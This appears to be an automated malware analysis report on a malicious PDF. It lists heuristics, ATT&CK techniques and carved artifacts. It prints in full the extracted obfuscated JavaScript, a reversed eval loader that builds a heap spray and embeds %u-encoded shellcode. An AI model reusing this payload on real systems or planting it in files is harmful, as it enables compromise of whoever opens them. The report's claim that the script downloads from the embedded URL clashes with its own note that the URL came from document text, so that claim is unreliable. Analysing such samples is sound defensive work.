Verdict: MALICIOUS
Risk Score: 88
Malware Insights
MITRE ATT&CK
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The PDF file contains embedded JavaScript, as indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, extracted as 'javascript_obj0012_000.js', is likely responsible for downloading and executing a second-stage payload from the embedded URL 'http://www.bitstream.com'. The presence of an ASCIIHexDecode filter alongside exploit indicators further suggests malicious intent.
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics (5)
- ASCIIHexDecode filter (with exploit indicators) [medium, PDF_FILTER_HEX]: Hex-encoding filter present alongside exploit delivery indicators; often used to hide payload or shellcode bytes.
- Suspicious extracted artifact [medium, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- JavaScript action [low, PDF_JAVASCRIPT, 1 related finding]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream [low, PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.bitstream.com (found in PDF document text).
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0012_000.js | pdf-javascript-stream | PDF /JS object 12 at offset 0x104F0 | 3780 bytes |
| font_00_sfnt_off00000319.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x319 | 65932 bytes |

Artifact details: javascript_obj0012_000.js
- SHA-256: 7016c9d9581a7ced8c75c217dab213a78fd7be2c283364c13a48c95e4938aa49
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
var eva=new Function("a","ev al (a);".split(" ").join(""));
var s=' ;"s"+ZxFfI=]jNheY[T )++jNheY;0f1x0<jNheY;0=jNheY( rof ;)(yarrA wen = T rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.ihadQ = ZxFfI ;ihadQ =+ ihadQ )00008x0 < htgnel.ihadQ(elihw ;)2/63556 ,0(gnirtsbus.TxCgy = ihadQ ;ABpL =+ TxCgy ;Prl =+ TxCgy ;)2/)42x0-c0c0x0( ,0(gnirtsbus.ABpL = TxCgy ;ABpL=+ABpL )63556 < 8 + 02 + htgnel.ABpL( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (X = ABpL rav ;) )""(nioj.)" "(tilps."4a14 u % 7f2b u % 85ab u % f471 u % 17f1 u % bdb4 u % 2187 u % bd95 u % debc u % 24ca u % cf1b u % 50ae u % 474b u % 1f2f u % d74c u % 7c 07 u % 7868 u % 99e4 u % 2d3b u % 1f68 u % f419 u % efcc u % 484d u % 9733 u % f0b3 u % 0120 u % c 0b0 u % e08f u % 6722 u % fc86 u % b242 u % b99c u % f568 u % 22b6 u % f3ed u % 3425 u % 6627 u % 79a2 u % 2a92 u % 3cc 0 u % d689 u % 649e u % 5dc9 u % 7b52 u % 9887 u % afe2 u % 9f27 u % 517b u % 9134 u % d5f0 u % 483e u % 1897 u % f389 u % cf97 u % 3cb5 u % 30a0 u % 38b5 u % e82f u % cb25 u % ead1 u % c336 u % 663c u % 7405 u % 9c7f u % a791 u % 403e u % a581 u % e6bb u % 110e u % dbfa u % e00b u % 8c51 u % b6e6 u % 07d6 u % bb1e u % 8ab4 u % e839 u % 9fb5 u % 5d4d u % 6f60 u % 198a u % 3e7c u % 8a76 u % ea7e u % 4d51 u % c656 u % 8c9b u % b634 u % de67 u % ad5e u % 1217 u % 9478 u % c614 u % 0abe u % 7e30 u % 1fbd u % 0764 u % 0c9c u % 9f3a u % f369 u % 6fb5 u % 6dfd u % 3872 u % 0771 u % 7130 u % 1307 u % 3085 u % 2dd3 u % eb7e u % 1b33 u % 424f u % 9d47 u % 339c u % ad0c u % 0070 u % f211 u % 0070 u % 137d u % 0070 u % d451 u % ff09 u % ffff u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % 0909 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % 0909 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 0909 u % ff09 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % ffff u % 8e6e u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % be50 u % 57ee u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % c 0c 0 u % c 0c 0 u % 0070 u 
% bb51 u % 0070 u % 227a u % 0070 u % d451 u % 18bf u % 2c40 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 4038 u % 380c u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 9881 u % b8a1 u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 5185 u % a5be u % 0070 u % bb51 u % 0070 u % 227a u % 0070 u % d451 u % 4509 u % a509 u % 0070 u % bb51 u % 0070 u % 137d u % 0000 u % 0400 u % 0000 u % 0001 u % 1000 u % 4010 u % 0000 u % 0000 u % 1000 u % 0010 u % ffff u % ffff u % 0070 u % 45c5 u % 0070 u % 2e25 u % 1000 u % 1100 u % 0070 u % 7f27 u % 0070 u % ca8a u % 1000 u % 0010 u % 0070 u % bb51 u % 0070 u % ca8a u % 1000 u % 1100 u % 0070 u % bb51 u % 0070 u % 2bf7 u % eff7 u % 0030 u % 0070 u % bb51 u % 0070 u % d451 u % 0000 u % 0001 u % 0070 u % bb51 u % 1000 u % 4010 u % 0070 u % 7f27 u % 1000 u % 4210 u % 0070 u % 9951 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % c 0c 0 u % c 0c 0 u % 0070 u % 4809 u % 0070 u % 3309 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % 0070 u % 4809 u % cccc u % cccc u % 0070 u % f651 u % 0070 u % fe84 u % cccc u % cccc u % 0070 u % 9194 u % c 0c 0 u % c 0c 0 u % " (X = Prl rav ;epacsenu = X rav ';
eva(s.split("").reverse().join(""));

Artifact details: font_00_sfnt_off00000319.bin
- SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
- ClamAV: No threats found
- Obfuscation or payload: likely (static shellcode analysis found candidate code region(s); indicators: heap spray 0x41 (A))